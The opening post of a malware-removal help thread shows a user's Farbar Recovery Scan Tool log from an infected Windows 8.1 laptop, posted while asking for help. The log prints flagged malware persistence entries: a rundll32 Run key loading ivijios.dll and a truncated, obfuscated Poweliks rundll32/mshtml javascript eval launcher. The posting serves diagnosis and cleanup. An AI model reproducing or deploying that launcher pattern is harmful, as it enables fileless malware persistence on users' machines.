Several malware issues, ivijios.dll & Wow64 error [Solved]



#1
smwifey (Member, 85 posts)

My brother asked me to try to speed up his computer. After messing with it for a while I see why he is having issues. I deleted Norton and installed Malwarebytes and Avira. Ran Malwarebytes and it found 89 problems. Now I am getting popups that say something about Wow64 error. Also on restart I get ivijios.dll errors. Installed and ran Farbar, here are scans:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:26-07-2015
Ran by Richie (administrator) on RICHIE (28-07-2015 16:34:42)
Running from C:\Users\Richie\Downloads
Loaded Profiles: Richie (Available Profiles: Richie)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\sched.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avguard.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avshadow.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6548112 2012-06-12] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3030256 2013-05-16] (Synaptics Incorporated)
HKLM-x32\...\Run: [CLVirtualDrive] => C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491320 2012-07-26] (CyberLink Corp.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [580512 2012-07-09] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [{b090579d-244c-e682-7cd6-e6daa5c7aff0}] => "C:\ProgramData\Microsoft\{b090579d-244c-e682-7cd6-e6daa5c7aff0}\{b090579d-244c-e682-7cd6-e6daa5c7aff0}.exe"
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [766688 2014-07-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Avira Systray] => C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe [134368 2015-06-02] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\Antivirus\avgnt.exe [782008 2015-07-15] (Avira Operations GmbH & Co. KG)
HKLM Group Policy restriction on software: C:\Program Files\Symantec <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\Run: [ivijios] => rundll32 "C:\Users\Richie\AppData\Local\ivijios.dll",ivijios <===== ATTENTION
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{eedc51b2-9627-4964-8aab-3c12119ef845} <======= ATTENTION (Policy restriction on IP)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPNOT13/1
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPNOT13/1
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPNOT13/1
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPNOT13/1
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/...q={searchTerms}
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/...q={searchTerms}
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...54371-11896-2/4?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Tcpip\Parameters: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{406A6EC4-A42A-4564-810E-0501F8EED96A}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{D51C3955-2AF3-49BA-9C94-C3C07B602A4D}: [DhcpNameServer] 192.168.254.254
 
FireFox:
========
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw.dll [2012-04-26] (Adobe Systems, Inc.)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-27] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-27] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2012-05-11] ()
 
Chrome: 
=======
CHR Profile: C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-07-27]
CHR Extension: (Google Docs) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-07-27]
CHR Extension: (Google Drive) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-07-27]
CHR Extension: (YouTube) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-07-27]
CHR Extension: (Google Search) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-07-27]
CHR Extension: (Google Sheets) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-07-27]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-07-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-27]
CHR Extension: (Gmail) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-27]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [361984 2012-08-06] (Advanced Micro Devices, Inc.) [File not signed]
S2 AntiVirMailService; C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe [887128 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\Antivirus\sched.exe [461672 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\Antivirus\avguard.exe [461672 2015-07-15] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe [1213072 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [217280 2015-06-02] (Avira Operations GmbH & Co. KG)
S3 BthHFSrv; C:\Windows\System32\BthHFSrv.dll [324608 2014-11-21] (Microsoft Corporation)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-06-18] (Malwarebytes Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
S3 w3logsvc; C:\Windows\system32\inetsrv\w3logsvc.dll [76800 2015-07-10] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdW86.sys [98472 2012-07-17] (Advanced Micro Devices)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [137288 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [148632 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [28600 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [43576 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-06-18] (Malwarebytes Corporation)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [266896 2012-06-13] (Realtek Semiconductor Corp.)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
S3 SmbDrvI; C:\Windows\System32\drivers\Smb_driver_Intel.sys [43832 2012-08-24] (Synaptics Incorporated)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2012-08-31] (Hewlett-Packard Development Company, L.P.)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-07-28 16:34 - 2015-07-28 16:35 - 00015115 _____ C:\Users\Richie\Downloads\FRST.txt
2015-07-28 16:34 - 2015-07-28 16:34 - 00000000 ____D C:\FRST
2015-07-28 16:30 - 2015-07-28 16:30 - 02146816 _____ (Farbar) C:\Users\Richie\Downloads\FRST64.exe
2015-07-28 16:00 - 2015-07-28 16:00 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Avira
2015-07-28 15:50 - 2015-07-15 08:37 - 00148632 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avipbb.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00137288 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avgntflt.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00043576 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avnetflt.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00028600 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avkmgr.sys
2015-07-28 15:13 - 2015-07-28 15:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2015-07-28 15:13 - 2015-07-28 15:13 - 00001132 _____ C:\Users\Public\Desktop\Avira.lnk
2015-07-28 15:12 - 2015-07-28 15:50 - 00000000 ____D C:\Program Files (x86)\Avira
2015-07-28 15:09 - 2015-07-28 16:04 - 00000000 ____D C:\ProgramData\Avira
2015-07-28 15:06 - 2015-07-28 15:08 - 04636584 _____ (Avira Operations GmbH & Co. KG) C:\Users\Richie\Downloads\avira.exe
2015-07-27 21:59 - 2015-07-28 16:21 - 00113880 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2015-07-27 21:58 - 2015-07-27 21:58 - 00001114 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-07-27 21:58 - 2015-06-18 08:42 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2015-07-27 21:58 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2015-07-27 21:58 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2015-07-27 21:03 - 2015-07-27 21:57 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Richie\Downloads\mbam-setup-2.1.8.1057.exe
2015-07-27 20:51 - 2015-07-27 20:51 - 00002275 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-07-27 20:51 - 2015-07-27 20:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-07-27 20:40 - 2015-07-28 16:09 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-27 20:40 - 2015-07-28 15:55 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-07-27 20:40 - 2015-07-27 21:50 - 00003892 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2015-07-27 20:40 - 2015-07-27 21:50 - 00003656 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2015-07-27 20:40 - 2015-07-27 20:50 - 00000000 ____D C:\Program Files (x86)\Google
2015-07-27 20:39 - 2015-07-27 20:51 - 00000000 ____D C:\Users\Richie\AppData\Local\Google
2015-07-27 20:39 - 2015-07-27 20:39 - 00000000 ____D C:\Users\Richie\AppData\Local\Deployment
2015-07-27 20:39 - 2015-07-27 20:39 - 00000000 ____D C:\Users\Richie\AppData\Local\Apps\2.0
2015-07-27 08:00 - 2015-07-27 08:00 - 00000000 ____D C:\Program Files\Common Files\AV
2015-07-24 13:07 - 2015-07-14 10:14 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2015-07-24 13:07 - 2015-07-14 10:14 - 00301056 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2015-07-24 13:07 - 2015-07-14 10:14 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2015-07-24 13:07 - 2015-07-14 10:13 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2015-07-24 13:07 - 2015-05-25 09:23 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\UtcResources.dll
2015-07-24 13:07 - 2015-05-25 09:07 - 01430528 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2015-07-22 19:34 - 2015-07-22 19:34 - 00000000 ____D C:\Users\Richie\AppData\Local\GWX
2015-07-20 08:25 - 2015-07-20 08:25 - 00000000 ____D C:\ProgramData\ATI
2015-07-20 08:00 - 2015-07-25 08:15 - 00000000 ___SD C:\WINDOWS\system32\GWX
2015-07-20 08:00 - 2015-07-20 08:00 - 00000000 ___SD C:\WINDOWS\SysWOW64\GWX
2015-07-17 10:59 - 2015-07-17 10:59 - 00266240 _____ C:\Users\Richie\AppData\Roaming\7afd7914.dll
2015-07-17 09:52 - 2015-07-17 09:52 - 00060601 _____ C:\WINDOWS\SysWOW64\CCCInstall_201507170952212808.log
2015-07-17 09:51 - 2015-07-17 09:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2015-07-17 09:49 - 2015-07-28 15:13 - 00000000 ____D C:\ProgramData\Package Cache
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default\AppData\Roaming\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default\AppData\Local\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default User\AppData\Roaming\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default User\AppData\Local\ATI
2015-07-17 09:45 - 2015-07-17 09:45 - 00000000 ____D C:\AMD
2015-07-17 09:43 - 2015-07-17 09:43 - 00000000 ____D C:\Program Files\AMD
2015-07-17 08:53 - 2015-07-17 08:53 - 00000000 ____D C:\WINDOWS\system32\appraiser
2015-07-16 13:18 - 2015-06-15 18:39 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2015-07-16 13:18 - 2015-06-15 18:38 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2015-07-16 13:18 - 2015-06-15 18:26 - 00633856 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2015-07-16 13:18 - 2015-06-15 18:24 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2015-07-16 13:18 - 2015-06-15 18:02 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2015-07-16 13:18 - 2015-06-15 17:58 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
2015-07-16 13:18 - 2015-06-15 17:57 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2015-07-16 13:18 - 2015-06-15 17:56 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2015-07-16 13:18 - 2015-06-15 17:55 - 00316928 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2015-07-16 13:18 - 2015-06-15 17:49 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2015-07-16 13:18 - 2015-06-15 17:41 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2015-07-16 13:18 - 2015-06-15 17:38 - 00801280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2015-07-16 13:18 - 2015-06-15 17:36 - 02125824 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2015-07-16 13:18 - 2015-06-15 17:17 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2015-07-16 13:18 - 2015-06-15 17:16 - 02427392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2015-07-16 13:18 - 2015-06-15 17:15 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2015-07-16 13:18 - 2015-06-15 17:13 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2015-07-16 13:18 - 2015-06-15 17:04 - 00478208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
2015-07-16 13:18 - 2015-06-15 17:03 - 00664064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2015-07-16 13:18 - 2015-06-15 16:52 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2015-07-16 13:18 - 2015-06-15 16:47 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2015-07-16 13:18 - 2015-06-15 16:44 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
2015-07-16 13:18 - 2015-06-15 16:43 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2015-07-16 13:18 - 2015-06-15 16:42 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2015-07-16 13:18 - 2015-06-15 16:41 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2015-07-16 13:18 - 2015-06-15 16:37 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2015-07-16 13:18 - 2015-06-15 16:32 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2015-07-16 13:18 - 2015-06-15 16:31 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2015-07-16 13:18 - 2015-06-15 16:30 - 02052608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2015-07-16 13:18 - 2015-06-15 16:30 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2015-07-16 13:18 - 2015-06-15 16:17 - 01048576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2015-07-16 13:18 - 2015-06-15 16:07 - 01951232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2015-07-16 13:18 - 2015-06-15 16:02 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2015-07-16 13:18 - 2015-05-22 23:14 - 00341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
2015-07-16 13:18 - 2015-05-22 23:04 - 00620032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2015-07-16 13:18 - 2015-05-22 15:00 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
2015-07-16 13:18 - 2015-05-22 14:47 - 00814080 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2015-07-16 13:18 - 2015-05-22 14:08 - 00374272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2015-07-16 13:18 - 2015-04-21 12:13 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\inseng.dll
2015-07-16 13:18 - 2015-04-21 11:49 - 00720384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2015-07-16 13:18 - 2015-01-11 22:21 - 00490496 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtmsft.dll
2015-07-16 13:18 - 2015-01-11 21:45 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtmsft.dll
2015-07-16 12:35 - 2015-07-02 17:21 - 19877376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2015-07-16 12:35 - 2015-07-02 16:50 - 02279424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2015-07-16 12:35 - 2015-07-02 16:49 - 25193984 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2015-07-16 12:35 - 2015-07-02 16:23 - 02885632 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2015-07-16 12:35 - 2015-07-02 16:19 - 12855296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2015-07-16 12:35 - 2015-07-02 15:55 - 01310720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2015-07-16 12:35 - 2015-07-02 15:20 - 14453248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2015-07-16 12:35 - 2015-07-02 14:59 - 01545728 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2015-07-16 12:00 - 2015-04-13 18:37 - 00275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\authz.dll
2015-07-16 12:00 - 2015-04-13 18:34 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authz.dll
2015-07-16 11:55 - 2015-07-01 18:08 - 05923840 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
